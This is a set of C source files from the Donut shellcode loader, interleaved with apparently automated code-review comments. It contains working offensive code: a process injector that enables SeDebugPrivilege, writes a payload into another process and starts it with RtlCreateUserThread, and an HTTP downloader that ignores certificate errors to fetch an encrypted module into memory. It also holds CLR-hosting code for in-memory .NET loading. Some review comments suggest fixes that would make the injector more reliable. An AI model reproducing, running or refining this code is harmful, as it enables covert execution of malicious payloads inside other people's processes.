269 len >>= 2;
270
271 // declare the array
272 fprintf(fd, "\nunsigned int %s[%i];\n\n", label, len);
273
274 // initialize array
275 for(i=0; i<len; i++) {
276 fprintf(fd, "%s[%i] = 0x%08" PRIX32 ";\n", label, i, p[i]);
277 }
278 fclose(fd);
279 printf(" [ Saved array to %s\n", file);
280 } else printf(" [ unable to create file : %s\n", file);
281 }
282 */
283 // structure of COFF (.obj) file
284
285 //--------------------------//
286 // IMAGE_FILE_HEADER //
287 //--------------------------//
288 // IMAGE_SECTION_HEADER //
289 // * num sections //
290 //--------------------------//
291 // //
292 // //
293 // //
294 // section data //
295 // * num sections //
296 // //
297 // //
298 //--------------------------//
299 // IMAGE_SYMBOL //
300 // * num symbols //
301 //--------------------------//
302 // string table //
303 //--------------------------//
304
305 int main (int argc, char *argv[]) {
306 int fd, i;
307 struct stat fs;
308 uint8_t *map, *cs;
309 PIMAGE_SECTION_HEADER sh;
310 //PIMAGE_FILE_HEADER fh;
311 //PIMAGE_COFF_SYMBOLS_HEADER csh;
312 uint32_t ofs, len;
313
314 if (argc != 2) {
315 printf ("\n [ usage: file2h <file.exe | file.bin>\n");
316 return 0;
317 }
318
319 // open file for reading
320 fd = open(argv[1], O_RDONLY);
321
322 if(fd == 0) {
323 printf(" [ unable to open %s\n", argv[1]);
324 return 0;
325 }
326 // if file has some data
327 if(fstat(fd, &fs) == 0) {
328 // map into memory
329 map = (uint8_t*)mmap(NULL, fs.st_size,
330 PROT_READ, MAP_PRIVATE, fd, 0);
331 if(map != NULL) {
332 if(valid_dos_hdr(map) && valid_nt_hdr(map)) {
333 printf(" [ Found valid DOS and NT header.\n");
334 // get the .text section
335 sh = SecHdr(map);
336 // if a section header was returned
337 if(sh != NULL) {
338 printf(" [ Locating .text section.\n");
339 // locate the .text section
340 for(i=0; i<SecSize(map); i++) {
341 if(strcmp((char*)sh[i].Name, ".text") == 0) {
342 ofs = rva2ofs(map, sh[i].VirtualAddress);
343
344 if(ofs != -1) {
345 cs = (map + ofs);
346 len = sh[i].Misc.VirtualSize;
347 // convert to header file
348 bin2h(map, argv[1], cs, len);
349 bin2go(map, argv[1], cs, len);
350 break;
351 }
352 }
353 }
354 }
355 } else {
356 printf(" [ No valid DOS or NT header found.\n");
357 // treat file as binary
358 bin2h(NULL, argv[1], map, fs.st_size);
359 bin2go(NULL, argv[1], map, fs.st_size);
360 //bin2array(NULL, argv[1], map, fs.st_size);
361 }
362 munmap(map, fs.st_size);
363 }
364 }
365 close(fd);
366 return 0;
367 }
0 /* mmap() replacement for Windows
1 *
2 * Author: Mike Frysinger <[email protected]>
3 * Placed into the public domain
4 */
5
6 /* References:
7 * CreateFileMapping: http://msdn.microsoft.com/en-us/library/aa366537(VS.85).aspx
8 * CloseHandle: http://msdn.microsoft.com/en-us/library/ms724211(VS.85).aspx
9 * MapViewOfFile: http://msdn.microsoft.com/en-us/library/aa366761(VS.85).aspx
10 * UnmapViewOfFile: http://msdn.microsoft.com/en-us/library/aa366882(VS.85).aspx
11 */
12
13 #include "mmap.h"
14
15 void *mmap(void *start, size_t length, int prot, int flags, int fd, off_t offset)
16 {
17 if (prot & ~(PROT_READ | PROT_WRITE | PROT_EXEC))
18 return MAP_FAILED;
19 if (fd == -1) {
20 if (!(flags & MAP_ANON) || offset)
21 return MAP_FAILED;
22 } else if (flags & MAP_ANON)
23 return MAP_FAILED;
24
25 DWORD flProtect;
26 if (prot & PROT_WRITE) {
27 if (prot & PROT_EXEC)
28 flProtect = PAGE_EXECUTE_READWRITE;
29 else
30 flProtect = PAGE_READWRITE;
31 } else if (prot & PROT_EXEC) {
32 if (prot & PROT_READ)
33 flProtect = PAGE_EXECUTE_READ;
34 else if (prot & PROT_EXEC)
35 flProtect = PAGE_EXECUTE;
36 } else
37 flProtect = PAGE_READONLY;
38
39 off_t end = length + offset;
40 HANDLE mmap_fd, h;
41 if (fd == -1)
42 mmap_fd = INVALID_HANDLE_VALUE;
43 else
44 mmap_fd = (HANDLE)_get_osfhandle(fd);
45 h = CreateFileMapping(mmap_fd, NULL, flProtect, DWORD_HI(end), DWORD_LO(end), NULL);
46 if (h == NULL)
47 return MAP_FAILED;
48
49 DWORD dwDesiredAccess;
50 if (prot & PROT_WRITE)
51 dwDesiredAccess = FILE_MAP_WRITE;
52 else
53 dwDesiredAccess = FILE_MAP_READ;
54 if (prot & PROT_EXEC)
55 dwDesiredAccess |= FILE_MAP_EXECUTE;
56 if (flags & MAP_PRIVATE)
57 dwDesiredAccess |= FILE_MAP_COPY;
58 void *ret = MapViewOfFile(h, dwDesiredAccess, DWORD_HI(offset), DWORD_LO(offset), length);
59 if (ret == NULL) {
60 ret = MAP_FAILED;
61 }
62 CloseHandle(h);
63 return ret;
64 }
65
66 void munmap(void *addr, size_t length)
67 {
68 UnmapViewOfFile(addr);
69 }
70
71 #undef DWORD_HI
72 #undef DWORD_LO
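Review bot: `off_t end = length + offset;` on line 39 stores the sum in `off_t`, which on MSVC and MinGW is typically a 32-bit `long` unless 64-bit offsets are enabled, so the maximum-size argument handed to `CreateFileMapping` on line 45 can be truncated for a large `length` or `offset` before `DWORD_HI`/`DWORD_LO` split it; a guard such as `if ((unsigned long long)length + (unsigned long long)offset > 0xffffffffULL) return MAP_FAILED;` would reject that case instead of mapping a shorter region. Every failure path (lines 18, 21, 23, 47, 60) returns `MAP_FAILED`, i.e. `(void *) -1`, never `NULL`, which deserves a comment above line 15 because the `if(map != NULL)` test in file2h's `main` earlier on this page cannot detect a failed mapping and would read through the bad pointer. `munmap` (lines 66–69) ignores `length` and returns `void`, so an `UnmapViewOfFile` failure is unobservable; `return UnmapViewOfFile(addr) ? 0 : -1;` with the matching prototype change in mmap.h would restore the POSIX contract.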
0
1
2 #ifndef MMAP_H
3 #define MMAP_H
4
5 #include <io.h>
6 #include <windows.h>
7 #include <sys/types.h>
8
9 #define PROT_READ 0x1
10 #define PROT_WRITE 0x2
11 /* This flag is only available in WinXP+ */
12 #ifdef FILE_MAP_EXECUTE
13 #define PROT_EXEC 0x4
14 #else
15 #define PROT_EXEC 0x0
16 #define FILE_MAP_EXECUTE 0
17 #endif
18
19 #define MAP_SHARED 0x01
20 #define MAP_PRIVATE 0x02
21 #define MAP_ANONYMOUS 0x20
22 #define MAP_ANON MAP_ANONYMOUS
23 #define MAP_FAILED ((void *) -1)
24
25 #ifdef __USE_FILE_OFFSET64
26 # define DWORD_HI(x) (x >> 32)
27 # define DWORD_LO(x) ((x) & 0xffffffff)
28 #else
29 # define DWORD_HI(x) (0)
30 # define DWORD_LO(x) (x)
31 #endif
32
33 #ifdef __cplusplus
34 extern "C" {
35 #endif
36
37 void *mmap(void *start, size_t length, int prot, int flags, int fd, off_t offset);
38 void munmap(void *addr, size_t length);
39
40 #ifdef __cplusplus
41 }
42 #endif
43
44 #endif
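Review bot: `# define DWORD_HI(x) (x >> 32)` on line 26 does not parenthesise its argument, so `DWORD_HI(a + b)` expands to `(a + b >> 32)`, which C parses as `a + (b >> 32)`; the safe form is `# define DWORD_HI(x) ((x) >> 32)`, matching the parenthesised `DWORD_LO` on line 27. The selector `__USE_FILE_OFFSET64` on line 25 looks like a glibc-internal name rather than one MinGW or MSVC define, in which case the 64-bit branch is never compiled and every mapping passes a zero high DWORD — worth confirming against the toolchains this header targets and documenting the resulting size limit. Lines 14–16 silently redefine `PROT_EXEC` to 0 when `FILE_MAP_EXECUTE` is unavailable, so a caller asking for an executable mapping is quietly given a non-executable view instead of an error; a comment such as `/* PROT_EXEC is a no-op on this SDK: the view is never executable */` would make that visible to readers of mmap.c.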
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 // Function to return the program counter.
32 // Always place this at the end of payload.
33 // Tested with x86 build of MSVC 2019 and MinGW. YMMV.
34 #if defined(_MSC_VER)
35 #if defined(_M_IX86)
36 __declspec(naked) char *get_pc(void) {
37 __asm {
38 call pc_addr
39 pc_addr:
40 pop eax
41 sub eax, 5
42 ret
43 }
44 }
45 #endif
46 #elif defined(__GNUC__)
47 #if defined(__i386__)
48 asm (
49 ".global get_pc\n"
50 ".global _get_pc\n"
51 "_get_pc:\n"
52 "get_pc:\n"
53 " call pc_addr\n"
54 "pc_addr:\n"
55 " pop %eax\n"
56 " sub $5, %eax\n"
57 " ret\n"
58 );
59 #endif
60 #endif
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 BOOL DownloadFromHTTP(PDONUT_INSTANCE inst) {
32 HINTERNET hin, con, req;
33 PBYTE buf;
34 DWORD s, n, rd, len, code=0;
35 BOOL bResult = FALSE, bSecure = FALSE;
36 URL_COMPONENTS uc;
37 CHAR host[DONUT_MAX_NAME],
38 file[DONUT_MAX_NAME];
39
40 // default flags for HTTP client
41 DWORD flags = INTERNET_FLAG_KEEP_CONNECTION |
42 INTERNET_FLAG_NO_CACHE_WRITE |
43 INTERNET_FLAG_NO_UI |
44 INTERNET_FLAG_RELOAD |
45 INTERNET_FLAG_NO_AUTO_REDIRECT;
46
47 Memset(&uc, 0, sizeof(uc));
48
49 uc.dwStructSize = sizeof(uc);
50 uc.lpszHostName = host;
51 uc.lpszUrlPath = file;
52 uc.dwHostNameLength = DONUT_MAX_NAME;
53 uc.dwUrlPathLength = DONUT_MAX_NAME;
54
55 DPRINT("Decoding URL %s", inst->server);
56
57 if(!inst->api.InternetCrackUrl(
58 inst->server, 0, ICU_DECODE, &uc)) {
59 return FALSE;
60 }
61
62 bSecure = (uc.nScheme == INTERNET_SCHEME_HTTPS);
63
64 // if secure connection, update the flags to ignore
65 // invalid certificates
66 if(bSecure) {
67 flags |= INTERNET_FLAG_IGNORE_CERT_CN_INVALID |
68 INTERNET_FLAG_IGNORE_CERT_DATE_INVALID |
69 INTERNET_FLAG_SECURE;
70 }
71
72 DPRINT("Initializing WININET");
73
74 hin = inst->api.InternetOpen(
75 NULL, INTERNET_OPEN_TYPE_PRECONFIG,
76 NULL, NULL, 0);
77
78 if(hin == NULL) return FALSE;
79
80 DPRINT("Creating %s connection for %s",
81 bSecure ? "HTTPS" : "HTTP", host);
82
83 con = inst->api.InternetConnect(
84 hin, host, uc.nPort, NULL, NULL,
85 INTERNET_SERVICE_HTTP, 0, 0);
86
87 if(con != NULL) {
88 DPRINT("Creating HTTP %s request for %s",
89 inst->http_req, file);
90
91 req = inst->api.HttpOpenRequest(
92 con, inst->http_req,
93 file, NULL, NULL, NULL, flags, 0);
94
95 if(req != NULL) {
96
97 // see if we should ignore invalid certificates for this request
98 if(bSecure) {
99 if(flags & INTERNET_FLAG_IGNORE_CERT_CN_INVALID) {
100 n = sizeof (s);
101
102 s = SECURITY_FLAG_IGNORE_UNKNOWN_CA |
103 SECURITY_FLAG_IGNORE_CERT_DATE_INVALID |
104 SECURITY_FLAG_IGNORE_CERT_CN_INVALID |
105 SECURITY_FLAG_IGNORE_WRONG_USAGE |
106 SECURITY_FLAG_IGNORE_REVOCATION;
107
108 DPRINT("Setting option to ignore invalid certificates");
109
110 inst->api.InternetSetOption(
111 req,
112 INTERNET_OPTION_SECURITY_FLAGS,
113 &s,
114 sizeof(s));
115 }
116 }
117 DPRINT("Sending request");
118
119 if(inst->api.HttpSendRequest(req, NULL, 0, NULL, 0)) {
120 len = sizeof(DWORD);
121 code = 0;
122 DPRINT("Querying status code");
123
124 if(inst->api.HttpQueryInfo(
125 req,
126 HTTP_QUERY_STATUS_CODE | HTTP_QUERY_FLAG_NUMBER,
127 &code, &len, 0))
128 {
129 DPRINT("Code is %ld", code);
130
131 if(code == HTTP_STATUS_OK) {
132 DPRINT("Querying content length");
133
134 len = sizeof(SIZE_T);
135 inst->mod_len = 0;
136
137 if(inst->api.HttpQueryInfo(
138 req,
139 HTTP_QUERY_CONTENT_LENGTH | HTTP_QUERY_FLAG_NUMBER,
140 &inst->mod_len, &len, 0))
141 {
142 if(inst->mod_len != 0) {
143 DPRINT("Allocating memory for module");
144
145 inst->module.p = inst->api.VirtualAlloc(
146 NULL, inst->mod_len,
147 MEM_COMMIT | MEM_RESERVE,
148 PAGE_READWRITE);
149
150 if(inst->module.p != NULL) {
151 rd = 0;
152 DPRINT("Downloading module into memory");
153 bResult = inst->api.InternetReadFile(
154 req,
155 inst->module.p,
156 inst->mod_len, &rd);
157 }
158 }
159 }
160 }
161 }
162 }
163 DPRINT("Closing request handle");
164 inst->api.InternetCloseHandle(req);
165 }
166 DPRINT("Closing HTTP connection");
167 inst->api.InternetCloseHandle(con);
168 }
169 DPRINT("Closing internet handle");
170 inst->api.InternetCloseHandle(hin);
171
172 if(bResult && inst->entropy == DONUT_ENTROPY_DEFAULT) {
173 PDONUT_MODULE mod = inst->module.p;
174
175 DPRINT("Decrypting %lli bytes of module", inst->mod_len);
176
177 donut_decrypt(inst->mod_key.mk,
178 inst->mod_key.ctr,
179 mod,
180 inst->mod_len);
181
182 DPRINT("Generating hash to verify decryption");
183 ULONG64 mac = maru(inst->sig, inst->iv);
184
185 DPRINT("Module : %016llx | Result : %016llx", mod->mac, mac);
186
187 if(mac != mod->mac) {
188 DPRINT("Decryption failed");
189 return FALSE;
190 }
191 }
192 return bResult;
193 }
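Review bot: The single `InternetReadFile` call on lines 153–156 is treated as a complete download, but `rd` (the byte count actually read) is never compared with `inst->mod_len`, and the value checked on lines 183–187 is `maru(inst->sig, inst->iv)` rather than a digest of the received buffer, so a truncated or partially-read body is accepted; `if(bResult && rd != inst->mod_len) bResult = FALSE;` after the read would close that gap. Server authentication is also switched off — lines 66–69 and 102–106 set every `INTERNET_FLAG_IGNORE_CERT_*` / `SECURITY_FLAG_IGNORE_*` option — so the module MAC, which runs only when `inst->entropy == DONUT_ENTROPY_DEFAULT` (line 172), is the sole integrity check on the transfer, and the comment on lines 64–65 should state that consequence rather than just the mechanism. The region from `VirtualAlloc` (lines 145–148) is not released on the `Decryption failed` return at line 189 or when `InternetReadFile` fails, leaving `inst->module.p` pointing at committed memory the caller has no signal to free; a `VirtualFree` on those paths, or a comment documenting that ownership stays with the caller, is needed.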
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #include <Windows.h>
32 #include <stdio.h>
33 #include <tlhelp32.h>
34
35 #pragma comment(lib, "advapi32.lib")
36 #pragma comment(lib, "shell32.lib")
37 #pragma comment(lib, "user32.lib")
38
39 typedef struct _CLIENT_ID {
40 PVOID UniqueProcess;
41 PVOID UniqueThread;
42 } CLIENT_ID, *PCLIENT_ID;
43
44 typedef NTSTATUS (NTAPI *RtlCreateUserThread_t) (
45 IN HANDLE ProcessHandle,
46 IN PSECURITY_DESCRIPTOR SecurityDescriptor OPTIONAL,
47 IN BOOLEAN CreateSuspended,
48 IN ULONG StackZeroBits,
49 IN OUT PULONG StackReserved,
50 IN OUT PULONG StackCommit,
51 IN PVOID StartAddress,
52 IN PVOID StartParameter OPTIONAL,
53 OUT PHANDLE ThreadHandle,
54 OUT PCLIENT_ID ClientID);
55
56 BOOL EnablePrivilege(PCHAR szPrivilege){
57 HANDLE hToken;
58 BOOL bResult;
59 LUID luid;
60 TOKEN_PRIVILEGES tp;
61
62 // open token for current process
63 bResult = OpenProcessToken(GetCurrentProcess(),
64 TOKEN_ADJUST_PRIVILEGES, &hToken);
65
66 if(!bResult) return FALSE;
67
68 // lookup privilege
69 bResult = LookupPrivilegeValue(NULL, szPrivilege, &luid);
70 if(bResult){
71 tp.PrivilegeCount = 1;
72 tp.Privileges[0].Luid = luid;
73 tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
74
75 // adjust token
76 bResult = AdjustTokenPrivileges(hToken, FALSE, &tp, 0, NULL, NULL);
77 }
78 CloseHandle(hToken);
79 return bResult;
80 }
81
82 // display error message for last error code
83 VOID xstrerror (PCHAR fmt, ...){
84 PCHAR error=NULL;
85 va_list arglist;
86 CHAR buffer[1024];
87 DWORD dwError=GetLastError();
88
89 va_start(arglist, fmt);
90 vsnprintf(buffer, ARRAYSIZE(buffer), fmt, arglist);
91 va_end (arglist);
92
93 if (FormatMessage (
94 FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,
95 NULL, dwError, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
96 (LPSTR)&error, 0, NULL))
97 {
98 printf(" [ %s : %s\n", buffer, error);
99 LocalFree (error);
100 } else {
101 printf(" [ %s error : %08lX\n", buffer, dwError);
102 }
103 }
104
105 DWORD name2pid(PCHAR procName){
106 HANDLE hSnap;
107 PROCESSENTRY32 pe32;
108 DWORD pid=0;
109
110 // create snapshot of system
111 hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
112 if(hSnap == INVALID_HANDLE_VALUE) return 0;
113
114 pe32.dwSize = sizeof(PROCESSENTRY32);
115
116 // get first process
117 if(Process32First(hSnap, &pe32)){
118 do {
119 if(!lstrcmpi(pe32.szExeFile, procName)){
120 pid=pe32.th32ProcessID;
121 break;
122 }
123 } while(Process32Next(hSnap, &pe32));
124 }
125 CloseHandle(hSnap);
126 return pid;
127 }
128
129 BOOL injectPIC(DWORD id, LPVOID code, DWORD codeLen) {
130 SIZE_T wr;
131 HANDLE hp,ht;
132 LPVOID cs;
133 RtlCreateUserThread_t pRtlCreateUserThread;
134 HMODULE hn;
135 CLIENT_ID cid;
136 NTSTATUS nt=~0UL;
137 DWORD t;
138
139 // 1. resolve API address
140 hn = GetModuleHandle("ntdll.dll");
141 pRtlCreateUserThread=(RtlCreateUserThread_t)
142 GetProcAddress(hn, "RtlCreateUserThread");
143
144 printf(" [ opening process %li\n", id);
145 // 2. open the target process
146 hp=OpenProcess(PROCESS_ALL_ACCESS, FALSE, id);
147
148 if(hp == NULL) return FALSE;
149
150 // 3. allocate executable-read-write (XRW) memory for payload
151 printf(" [ allocating memory for payload.\n");
152 cs=VirtualAllocEx(hp, NULL, codeLen,
153 MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
154
155 printf(" [ writing code to %p.\n", cs);
156 // 4. copy the payload to remote memory
157 WriteProcessMemory(hp, cs, code, codeLen, &wr);
158 VirtualProtectEx(hp, cs, codeLen, PAGE_EXECUTE_READ, &t);
159
160 printf(" [ press any key to continue.\n");
161 getchar();
162
163 // 5. execute payload in remote process
164 printf(" [ creating new thread.\n");
165 nt = pRtlCreateUserThread(hp, NULL, FALSE, 0, NULL,
166 NULL, cs, NULL, &ht, &cid);
167
168 //AttachConsole(id);
169
170 printf(" [ nt status is %lx\n", nt);
171 WaitForSingleObject(ht, INFINITE);
172
173 // 6. close remote thread handle
174 CloseHandle(ht);
175
176 // 7. free remote memory
177 printf(" [ freeing memory.\n");
178 VirtualFreeEx(hp, cs, codeLen, MEM_RELEASE | MEM_DECOMMIT);
179
180 // 8. close remote process handle
181 CloseHandle(hp);
182 return nt == 0; // STATUS_SUCCESS
183 }
184
185 DWORD getdata(PCHAR path, LPVOID *data){
186 HANDLE hf;
187 DWORD len,rd=0;
188
189 // 1. open the file
190 hf=CreateFile(path, GENERIC_READ, 0, 0,
191 OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
192
193 if(hf!=INVALID_HANDLE_VALUE){
194 // get file size
195 len=GetFileSize(hf, 0);
196 // allocate memory
197 *data=malloc(len + 16);
198 // read file contents into memory
199 ReadFile(hf, *data, len, &rd, 0);
200 CloseHandle(hf);
201 }
202 return rd;
203 }
204
205 int main(int argc, char *argv[]){
206 LPVOID code;
207 SIZE_T code_len;
208 DWORD pid;
209
210 if (argc != 3){
211 printf("\n [ usage: inject <process id | process name> <payload.bin>\n");
212 return 0;
213 }
214
215 if(!EnablePrivilege(SE_DEBUG_NAME)) {
216 printf(" [ cannot enable SeDebugPrivilege.\n");
217 }
218
219 // get pid
220 pid=atoi(argv[1]);
221 if(pid==0) pid=name2pid(argv[1]);
222
223 if(pid==0) {
224 printf(" [ unable to obtain process id.\n");
225 return 0;
226 }
227 // pic
228 code_len = getdata(argv[2], &code);
229 if(code_len == 0) {
230 printf(" [ unable to read payload.\n");
231 return 0;
232 }
233 injectPIC(pid, code, code_len);
234 free(code);
235 return 0;
236 }
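Review bot: `EnablePrivilege` (lines 56–80) treats a nonzero return from `AdjustTokenPrivileges` on line 76 as success, but that API also returns TRUE when the privilege is absent from the token and reports it through `ERROR_NOT_ALL_ASSIGNED`, so the `cannot enable SeDebugPrivilege` message in `main` (line 216) is never reached in that case; `if(bResult && GetLastError() == ERROR_NOT_ALL_ASSIGNED) bResult = FALSE;` after line 76 makes the check honest. In `injectPIC`, `cs` from `VirtualAllocEx` (line 152) and `pRtlCreateUserThread` from `GetProcAddress` (line 141) are used without a NULL check, and `ht` is never initialised, so when the call on line 165 fails an indeterminate handle reaches `WaitForSingleObject` and `CloseHandle` (lines 171, 174); initialise `ht = NULL` and guard those two calls with `if(nt == 0)`. `VirtualFreeEx(hp, cs, codeLen, MEM_RELEASE | MEM_DECOMMIT)` on line 178 combines flags the API forbids together and passes a nonzero size with `MEM_RELEASE`, so the free fails and the region persists; `VirtualFreeEx(hp, cs, 0, MEM_RELEASE);` is the documented form. `getdata` (lines 185–203) ignores the results of `GetFileSize`, `malloc` and `ReadFile`, so an `INVALID_FILE_SIZE` return would request a roughly 4 GiB allocation and a short read is reported as success; `xstrerror` (lines 83–103) is defined for exactly these situations but is never called.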
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 BOOL LoadAssembly(PDONUT_INSTANCE inst, PDONUT_MODULE mod, PDONUT_ASSEMBLY pa) {
32 HRESULT hr = S_OK;
33 BSTR domain;
34 SAFEARRAYBOUND sab;
35 SAFEARRAY *sa;
36 DWORD i;
37 BOOL loaded=FALSE, loadable;
38 PBYTE p;
39 WCHAR buf[DONUT_MAX_NAME];
40
41 if(inst->api.CLRCreateInstance != NULL) {
42 DPRINT("CLRCreateInstance");
43
44 hr = inst->api.CLRCreateInstance(
45 (REFCLSID)&inst->xCLSID_CLRMetaHost,
46 (REFIID)&inst->xIID_ICLRMetaHost,
47 (LPVOID*)&pa->icmh);
48
49 if(SUCCEEDED(hr)) {
50 DPRINT("ICLRMetaHost::GetRuntime(\"%s\")", mod->runtime);
51 ansi2unicode(inst, mod->runtime, buf);
52
53 hr = pa->icmh->lpVtbl->GetRuntime(
54 pa->icmh, buf,
55 (REFIID)&inst->xIID_ICLRRuntimeInfo, (LPVOID)&pa->icri);
56
57 if(SUCCEEDED(hr)) {
58 DPRINT("ICLRRuntimeInfo::IsLoadable");
59 hr = pa->icri->lpVtbl->IsLoadable(pa->icri, &loadable);
60
61 if(SUCCEEDED(hr) && loadable) {
62 DPRINT("ICLRRuntimeInfo::GetInterface");
63
64 hr = pa->icri->lpVtbl->GetInterface(
65 pa->icri,
66 (REFCLSID)&inst->xCLSID_CorRuntimeHost,
67 (REFIID)&inst->xIID_ICorRuntimeHost,
68 (LPVOID)&pa->icrh);
69
70 DPRINT("HRESULT: %08lx", hr);
71 }
72 } else pa->icri = NULL;
73 } else pa->icmh = NULL;
74 }
75 if(FAILED(hr)) {
76 DPRINT("CLRCreateInstance failed. Trying CorBindToRuntime");
77
78 hr = inst->api.CorBindToRuntime(
79 NULL, // load whatever's available
80 NULL, // load workstation build
81 &inst->xCLSID_CorRuntimeHost,
82 &inst->xIID_ICorRuntimeHost,
83 (LPVOID*)&pa->icrh);
84
85 DPRINT("HRESULT: %08lx", hr);
86 }
87
88 if(FAILED(hr)) {
89 pa->icrh = NULL;
90 return FALSE;
91 }
